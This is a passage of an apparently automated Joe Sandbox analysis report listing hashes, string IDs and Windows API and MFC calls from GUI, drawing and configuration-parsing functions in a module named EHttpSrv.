                                                                                                                • Instruction Fuzzy Hash: 34519E70B447409AF71987F08856BFE61A5DB90F08F40CA2DB6918B7E0DE7DAC828745
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20401670: malloc.MSVCR80 ref: 2040169E
                                                                                                                  • Part of subcall function 20401670: malloc.MSVCR80 ref: 204016B0
                                                                                                                  • Part of subcall function 20401670: free.MSVCR80 ref: 204016BD
                                                                                                                • #310.MFC80U(00000001), ref: 2046875C
                                                                                                                • #310.MFC80U ref: 2046876E
                                                                                                                • #4026.MFC80U(000000B6), ref: 20468782
                                                                                                                • #4026.MFC80U(000000B2), ref: 20468791
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00000010), ref: 204687A5
                                                                                                                • #578.MFC80U ref: 204687B4
                                                                                                                • #578.MFC80U ref: 204687C6
                                                                                                                • #1176.MFC80U(?,-00003AB4,?,?), ref: 204687D1
                                                                                                                • realloc.MSVCR80 ref: 20468AAA
                                                                                                                  • Part of subcall function 2041B690: memmove_s.MSVCR80 ref: 2041B6E2
                                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 20468B8A
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 20468BC7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026#578Globalmalloc$#1176AllocFreeMessagefreememmove_srealloc
                                                                                                                • String ID: <?xml version="1.0" encoding="utf-8"?>$<?xml version="1.0"?>$ALL$NAME$REMOVED$RULE$ZONE
                                                                                                                • API String ID: 3761394589-1430527591
                                                                                                                • Opcode ID: a74c6a03c573ab209a753c9af0f6d51fd380f11e6a6ff1b28efef78ec990bb88
                                                                                                                • Instruction ID: 6e10fa3624d86319f28baa58daf9d5af0a5b43c5a6595124e08bec108179230f
                                                                                                                • Opcode Fuzzy Hash: a74c6a03c573ab209a753c9af0f6d51fd380f11e6a6ff1b28efef78ec990bb88
                                                                                                                • Instruction Fuzzy Hash: 3F029AB06047419FD720CF94CC80B5AB7E5BF84708F108A2EF98587B92E779AA45CF52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ADDRESS$BEGIN$DESCRIPTION$END$FLAGS$IP6_ADDR$IP6_SUBNET$IP_ADDR$IP_RANGE$IP_SUBNET$MASK$MASKBITS$MODIFIED$NAME$USER_NAME$VALUE
                                                                                                                • API String ID: 0-527909642
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,?,00000001,00000000,?), ref: 2044216C
                                                                                                                • #310.MFC80U(00000000,?,00000001,00000000,?), ref: 20442180
                                                                                                                • #310.MFC80U(?,00000001,00000000,?), ref: 20442192
                                                                                                                • #4026.MFC80U(00000218,?,00000001,00000000,?), ref: 204421A9
                                                                                                                • #4026.MFC80U(000000B2,?,00000001,00000000,?), ref: 204421B8
                                                                                                                • #578.MFC80U ref: 204421E3
                                                                                                                • #578.MFC80U ref: 204421F5
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20442223
                                                                                                                • #314.MFC80U(00000000,?,00000000), ref: 20442280
                                                                                                                • #310.MFC80U(00000000,?,00000000), ref: 20442294
                                                                                                                • #310.MFC80U(?,00000000), ref: 204422A5
                                                                                                                • #4026.MFC80U(000002B0,?,00000000), ref: 204422BC
                                                                                                                • #4026.MFC80U(000000B2,?,00000000), ref: 204422CB
                                                                                                                • #578.MFC80U ref: 204422FE
                                                                                                                • #578.MFC80U ref: 20442310
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044233E
                                                                                                                  • Part of subcall function 2043E1B0: memcpy_s.MSVCR80 ref: 2043E218
                                                                                                                  • Part of subcall function 2043E1B0: memcpy_s.MSVCR80 ref: 2043E242
                                                                                                                  • Part of subcall function 2043E1B0: memcpy_s.MSVCR80 ref: 2043E272
                                                                                                                  • Part of subcall function 2043E1B0: memcpy_s.MSVCR80 ref: 2043E29F
                                                                                                                • #578.MFC80U ref: 20442353
                                                                                                                • #578.MFC80U ref: 20442365
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310#4026memcpy_s$#314#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 1842428633-3916222277
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20456E81
                                                                                                                • #310.MFC80U ref: 20456E93
                                                                                                                • #4026.MFC80U(000000AD), ref: 20456EAA
                                                                                                                • #4026.MFC80U(000000AE), ref: 20456EB9
                                                                                                                • #900.MFC80U( (*.exe)|*.exe|), ref: 20456EC8
                                                                                                                • #896.MFC80U(?), ref: 20456ED7
                                                                                                                • #900.MFC80U( (*.*)|*.*|), ref: 20456EE6
                                                                                                                • #385.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456F00
                                                                                                                • #2012.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456F11
                                                                                                                • #3082.MFC80U(?,00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456F28
                                                                                                                  • Part of subcall function 2040E820: #764.MFC80U(?,00000000,?,2040F224,?,00000001), ref: 2040E830
                                                                                                                  • Part of subcall function 2040E820: #265.MFC80U(00000000,?,00000000,?,2040F224,?,00000001), ref: 2040E876
                                                                                                                  • Part of subcall function 2040E820: _wcsupr_s.MSVCR80 ref: 2040E896
                                                                                                                • #578.MFC80U(?,00000001,?,00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456F4F
                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFF), ref: 20456FAF
                                                                                                                • #630.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456FCE
                                                                                                                • #578.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 20456FDF
                                                                                                                • #578.MFC80U(?,00000000), ref: 20456FF1
                                                                                                                • #764.MFC80U(00000000,?,00000000), ref: 20457007
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310#4026#764#900$#2012#265#3082#385#630#896MessageSend_wcsupr_s
                                                                                                                • String ID: (*.*)|*.*|$ (*.exe)|*.exe|$@
                                                                                                                • API String ID: 4155270257-2039417011
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2045C44D
                                                                                                                • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 2045C48D
                                                                                                                • #310.MFC80U ref: 2045C499
                                                                                                                • #3985.MFC80U(00000000), ref: 2045C4B7
                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 2045C4D3
                                                                                                                • #2861.MFC80U(00000000), ref: 2045C4F0
                                                                                                                • #776.MFC80U(?,00000000), ref: 2045C525
                                                                                                                • #2490.MFC80U(00000000,?,?), ref: 2045C5C7
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 2045C773
                                                                                                                  • Part of subcall function 204110E0: #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041110A
                                                                                                                  • Part of subcall function 204110E0: #764.MFC80U(20462D01,?,?,?,204127C5,?,20462D02), ref: 2041111A
                                                                                                                  • Part of subcall function 204110E0: #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041112A
                                                                                                                  • Part of subcall function 204110E0: #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041113A
                                                                                                                  • Part of subcall function 204110E0: #265.MFC80U(00000000,?,?,?,204127C5,?,20462D02), ref: 20411183
                                                                                                                  • Part of subcall function 204110E0: #265.MFC80U(00000000,?,?,?,204127C5,?,20462D02), ref: 204111E3
                                                                                                                • #764.MFC80U(?,00000000,?,00000000,?,?), ref: 2045C614
                                                                                                                • #764.MFC80U(?,00000000,?,00000000,?,?), ref: 2045C625
                                                                                                                • #764.MFC80U(?,00000000,?,00000000,?,?), ref: 2045C636
                                                                                                                • #764.MFC80U(?,00000000,?,00000000,?,?), ref: 2045C647
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 2045C666
                                                                                                                • #2490.MFC80U(00000000), ref: 2045C6AB
                                                                                                                • #2490.MFC80U(00000000,?,?,00000000), ref: 2045C6D8
                                                                                                                • #764.MFC80U(?,?,00000000,?,?,00000000), ref: 2045C710
                                                                                                                • #764.MFC80U(?,?,00000000,?,?,00000000), ref: 2045C721
                                                                                                                • #764.MFC80U(?,?,00000000,?,?,00000000), ref: 2045C732
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 2045C752
                                                                                                                • #578.MFC80U ref: 2045C795
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2045C7C3
                                                                                                                Similarity
                                                                                                                • API ID: #764$MessageSend$#2490$#265$#2861#310#314#3985#578#6751#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 127330169-0
                                                                                                                APIs
                                                                                                                • #501.MFC80U(?,FEEA6C22), ref: 204380B5
                                                                                                                • #2521.MFC80U(?,?,FEEA6C22), ref: 204380CC
                                                                                                                • #347.MFC80U(?,?,FEEA6C22), ref: 204380D5
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 204380E7
                                                                                                                • #1270.MFC80U(00000000), ref: 204380F2
                                                                                                                • LPtoDP.GDI32(?,?,00000002), ref: 20438103
                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 20438144
                                                                                                                • #1271.MFC80U(00000000), ref: 2043814F
                                                                                                                • #5633.MFC80U(?,?,00000000), ref: 2043815E
                                                                                                                • GetMapMode.GDI32(?,?,?,00000000), ref: 2043816A
                                                                                                                • #5884.MFC80U(00000000), ref: 20438175
                                                                                                                • GetBkColor.GDI32(?), ref: 2043817F
                                                                                                                • #5723.MFC80U(00000000), ref: 2043818C
                                                                                                                • GetTextColor.GDI32(?), ref: 20438196
                                                                                                                • #6033.MFC80U(00000000), ref: 204381A1
                                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 204381B2
                                                                                                                • #6058.MFC80U(?,?,?), ref: 204381CB
                                                                                                                • #2255.MFC80U(?,00000000,?,?,?), ref: 204381DA
                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 20438208
                                                                                                                • #5633.MFC80U(?,00000000), ref: 2043821B
                                                                                                                • #602.MFC80U(?,00000000), ref: 2043824D
                                                                                                                • #709.MFC80U(?,00000000), ref: 20438261
                                                                                                                Similarity
                                                                                                                • API ID: #5633ColorCompatibleCreate$#1270#1271#2255#2521#347#501#5723#5884#602#6033#6058#709BitmapModeText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2901122701-0
                                                                                                                • Opcode ID: 078ad46cc0a4d2776df4ddafef8a383dcd76b06343dead18b5f7682e13ee46c3
                                                                                                                • Instruction ID: 8ae041d4327c59bec469319d960c77a5f5bff641b4c54045de56944f76c38e2a
                                                                                                                • Opcode Fuzzy Hash: 078ad46cc0a4d2776df4ddafef8a383dcd76b06343dead18b5f7682e13ee46c3
                                                                                                                • Instruction Fuzzy Hash: C4511A72118380AFC314CBA4CC85FABBBB8FBD9A14F008A1DF59597250DB35A904CB62
                                                                                                                APIs
                                                                                                                • #2872.MFC80U(00000000,00000002,FEEA6C22,?,00000000,00000000,?), ref: 204361BF
                                                                                                                • GetSysColor.USER32(00000005), ref: 2043627F
                                                                                                                • GetSysColor.USER32(0000000D), ref: 20436295
                                                                                                                • GetSysColor.USER32(0000000E), ref: 2043629B
                                                                                                                • #2255.MFC80U(?,00000000,?,00000000,00000000,?), ref: 204362A9
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 204362F1
                                                                                                                • #2362.MFC80U(00000000,?,00000000,00000000,?), ref: 204362F8
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 2043630B
                                                                                                                • #2362.MFC80U(00000000,?,00000000,00000000,?), ref: 20436312
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 20436326
                                                                                                                • #1925.MFC80U(?,00000000,00000000,?), ref: 2043635E
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 20436368
                                                                                                                • #1271.MFC80U(00000000,?,00000000,00000000,?), ref: 20436374
                                                                                                                • CopyRect.USER32(?,?), ref: 20436392
                                                                                                                • #5727.MFC80U(00000001,?,00000000,00000000,?), ref: 204363BC
                                                                                                                • #1079.MFC80U(?,00000000), ref: 204363D4
                                                                                                                • #1079.MFC80U(?,?,?,?,?,00000001), ref: 20436402
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 20436416
                                                                                                                • #6735.MFC80U(?), ref: 20436434
                                                                                                                • #578.MFC80U ref: 20436471
                                                                                                                • #5727.MFC80U(?), ref: 2043647E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$#1079#2362#5727Object$#1271#1925#2255#2872#578#6735CopyCreateCurrentFontIndirectMessageMetricsRectSendSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3417120401-0
                                                                                                                • Opcode ID: fbb5713d10b500bb0ddd90dabc36e43dcc18d4f2127db6884119fbddb8766d62
                                                                                                                • Instruction ID: 02342d8d71c409c69d00bd3735ca41ed132bb34a9b4c2763180ef7ad355d78db
                                                                                                                • Opcode Fuzzy Hash: fbb5713d10b500bb0ddd90dabc36e43dcc18d4f2127db6884119fbddb8766d62
                                                                                                                • Instruction Fuzzy Hash: 8FA16A716043419FD724DFA4C894FABB7E9BF88714F11CA6DF9499B391DA38A800CB52
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 20432013
                                                                                                                • GetParent.USER32(?), ref: 2043201D
                                                                                                                • #2366.MFC80U(00000000), ref: 20432024
                                                                                                                • SendMessageW.USER32(?,00000138,?,?), ref: 20432053
                                                                                                                • GetBkColor.GDI32(?), ref: 2043205F
                                                                                                                • GetTextColor.GDI32(?), ref: 20432076
                                                                                                                • #2362.MFC80U(00000000), ref: 20432085
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 2043209C
                                                                                                                • FillRect.USER32(?,?,?), ref: 204320B1
                                                                                                                  • Part of subcall function 2043BAC0: GetCurrentObject.GDI32(?,00000006), ref: 2043BAF1
                                                                                                                  • Part of subcall function 2043BAC0: GetObjectW.GDI32(00000000,0000005C,?), ref: 2043BB01
                                                                                                                  • Part of subcall function 2043BAC0: CreateFontIndirectW.GDI32(?), ref: 2043BB0C
                                                                                                                  • Part of subcall function 2043BAC0: SelectObject.GDI32(?,00000000), ref: 2043BB14
                                                                                                                  • Part of subcall function 2043BAC0: SelectObject.GDI32(?,00000000), ref: 2043BB3C
                                                                                                                  • Part of subcall function 2043BAC0: DeleteObject.GDI32(00000000), ref: 2043BB43
                                                                                                                • InflateRect.USER32(?,000000FE,00000000), ref: 204320DC
                                                                                                                • #5727.MFC80U(00000001), ref: 20432108
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20432129
                                                                                                                • #2362.MFC80U(00000000), ref: 20432130
                                                                                                                • #764.MFC80U(?), ref: 2043214F
                                                                                                                • #5727.MFC80U(?), ref: 204321EA
                                                                                                                  • Part of subcall function 204316C0: SetRectEmpty.USER32(?), ref: 204316D3
                                                                                                                  • Part of subcall function 204316C0: SetRectEmpty.USER32(?), ref: 204316DA
                                                                                                                  • Part of subcall function 204316C0: SetRectEmpty.USER32(?), ref: 204316DD
                                                                                                                  • Part of subcall function 204316C0: CopyRect.USER32(?,?), ref: 20431721
                                                                                                                  • Part of subcall function 204316C0: CopyRect.USER32(?,?), ref: 2043172F
                                                                                                                • GetFocus.USER32 ref: 20432230
                                                                                                                • #2366.MFC80U(00000000,?,?,?), ref: 20432237
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 2043224D
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 20432262
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 20432277
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Object$Focus$DrawEmpty$#2362#2366#5727ColorCopyFillMessageSelectSend$#764ClientCreateCurrentDeleteFontIndirectInflateParentText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2675783874-0
                                                                                                                • Opcode ID: b180d1408771614da0c1c48bec4abd0d5b74ec03b1dbede2c11c350b72fa5edf
                                                                                                                • Instruction ID: cd54de75ae23a6b363c5d34842b5dadbeaba6e3f888a96cf96408ed18cc99268
                                                                                                                • Opcode Fuzzy Hash: b180d1408771614da0c1c48bec4abd0d5b74ec03b1dbede2c11c350b72fa5edf
                                                                                                                • Instruction Fuzzy Hash: 64912C71604240AFCB44DFA8CD84EAA77B9BFC8704F24866DFD498B255DA38ED05CB61
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20454761
                                                                                                                • #310.MFC80U ref: 20454773
                                                                                                                • #4026.MFC80U(000000AD), ref: 2045478A
                                                                                                                • #4026.MFC80U(000000AE), ref: 20454799
                                                                                                                • #900.MFC80U( (*.exe)|*.exe|), ref: 204547A8
                                                                                                                • #896.MFC80U(?), ref: 204547B7
                                                                                                                • #900.MFC80U( (*.*)|*.*|), ref: 204547C6
                                                                                                                • #385.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 204547E0
                                                                                                                • #2012.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 204547F1
                                                                                                                • #3082.MFC80U(?,00000001,00000000,00000000,00881001,?,?,00000000), ref: 20454808
                                                                                                                  • Part of subcall function 2040E820: #764.MFC80U(?,00000000,?,2040F224,?,00000001), ref: 2040E830
                                                                                                                  • Part of subcall function 2040E820: #265.MFC80U(00000000,?,00000000,?,2040F224,?,00000001), ref: 2040E876
                                                                                                                  • Part of subcall function 2040E820: _wcsupr_s.MSVCR80 ref: 2040E896
                                                                                                                • #578.MFC80U(?,00000001,?,00000001,00000000,00000000,00881001,?,?,00000000), ref: 20454833
                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFF), ref: 20454897
                                                                                                                • #630.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 204548B6
                                                                                                                • #578.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 204548C7
                                                                                                                • #578.MFC80U(?,00000000), ref: 204548D9
                                                                                                                • #764.MFC80U(00000000,?,00000000), ref: 204548EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310#4026#764#900$#2012#265#3082#385#630#896MessageSend_wcsupr_s
                                                                                                                • String ID: (*.*)|*.*|$ (*.exe)|*.exe|
                                                                                                                • API String ID: 4155270257-1718033337
                                                                                                                • Opcode ID: 1cddeaf09556f71b27d46462ae54488118dae2c83bbfc0590247355c0c1c9202
                                                                                                                • Instruction ID: c93757d751d0b7f6ce5e584a57ba34fd33dfaff37aad5596ab69ee7b61a1648e
                                                                                                                • Opcode Fuzzy Hash: 1cddeaf09556f71b27d46462ae54488118dae2c83bbfc0590247355c0c1c9202
                                                                                                                • Instruction Fuzzy Hash: 8D517371108780AFC325DF54CC85B9BBBE8FF94B19F408A2DF495922A0DB759508CB93
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042C250: #4574.MFC80U(?,20457514), ref: 2042C253
                                                                                                                • #2651.MFC80U(000004F3), ref: 2045884D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20458863
                                                                                                                • #2155.MFC80U(00000000), ref: 20458871
                                                                                                                • #6086.MFC80U(00000000,00000000), ref: 2045887A
                                                                                                                • #2651.MFC80U(0000042A,00000000,00000000), ref: 20458886
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20458896
                                                                                                                • #5609.MFC80U(?), ref: 2045889F
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 204588C6
                                                                                                                • #2651.MFC80U(000004F7,?,?,?,?,00000001,?), ref: 204588D2
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204588E2
                                                                                                                • #5609.MFC80U(?), ref: 204588EB
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 20458912
                                                                                                                • #2651.MFC80U(0000040B,?,?,?,?,00000001,?), ref: 2045891E
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2045892E
                                                                                                                • #5609.MFC80U(?), ref: 20458937
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 20458964
                                                                                                                • #2651.MFC80U(00001772,?,?,?,?,00000001,?), ref: 20458970
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20458980
                                                                                                                • #5609.MFC80U(?), ref: 20458989
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 204589B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651RectWindow$#4119#5609$#2155#4574#6086
                                                                                                                • String ID:
                                                                                                                • API String ID: 1988953342-0
                                                                                                                • Opcode ID: c13e60bc6c3f0ce5ac8287fcc5224fca9e2dc996d1ea6a8cbbada187e44eb291
                                                                                                                • Instruction ID: 459a22ac6ff8665e4377593c6da4157b1f8012e2bbd72c92c5f2a2fa9f544e88
                                                                                                                • Opcode Fuzzy Hash: c13e60bc6c3f0ce5ac8287fcc5224fca9e2dc996d1ea6a8cbbada187e44eb291
                                                                                                                • Instruction Fuzzy Hash: 29515FB13043069FD704DFA8CC55EBFB7E9EBC8A08F008A2DB58597291DA78EC058795
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042C250: #4574.MFC80U(?,20457514), ref: 2042C253
                                                                                                                • #2651.MFC80U(000004F6), ref: 2045754D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20457563
                                                                                                                • #2155.MFC80U(00000000), ref: 20457571
                                                                                                                • #6086.MFC80U(00000000,00000000), ref: 2045757A
                                                                                                                • #2651.MFC80U(0000042A,00000000,00000000), ref: 20457586
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20457596
                                                                                                                • #5609.MFC80U(?), ref: 2045759F
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 204575C6
                                                                                                                • #2651.MFC80U(000004F8,?,?,?,?,00000001,?), ref: 204575D2
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204575E2
                                                                                                                • #5609.MFC80U(?), ref: 204575EB
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 20457612
                                                                                                                • #2651.MFC80U(0000040B,?,?,?,?,00000001,?), ref: 2045761E
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2045762E
                                                                                                                • #5609.MFC80U(?), ref: 20457637
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 20457664
                                                                                                                • #2651.MFC80U(00001772,?,?,?,?,00000001,?), ref: 20457670
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20457680
                                                                                                                • #5609.MFC80U(?), ref: 20457689
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 204576B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651RectWindow$#4119#5609$#2155#4574#6086
                                                                                                                • String ID:
                                                                                                                • API String ID: 1988953342-0
                                                                                                                • Opcode ID: e1965dff9c50a29cb80de7048452725fb93de9bb5d2244790109066319457e8f
                                                                                                                • Instruction ID: 0654eef182be6b3dd22a090d9fa8510fa7f27e5aa5ffc964efdf0b45828594fc
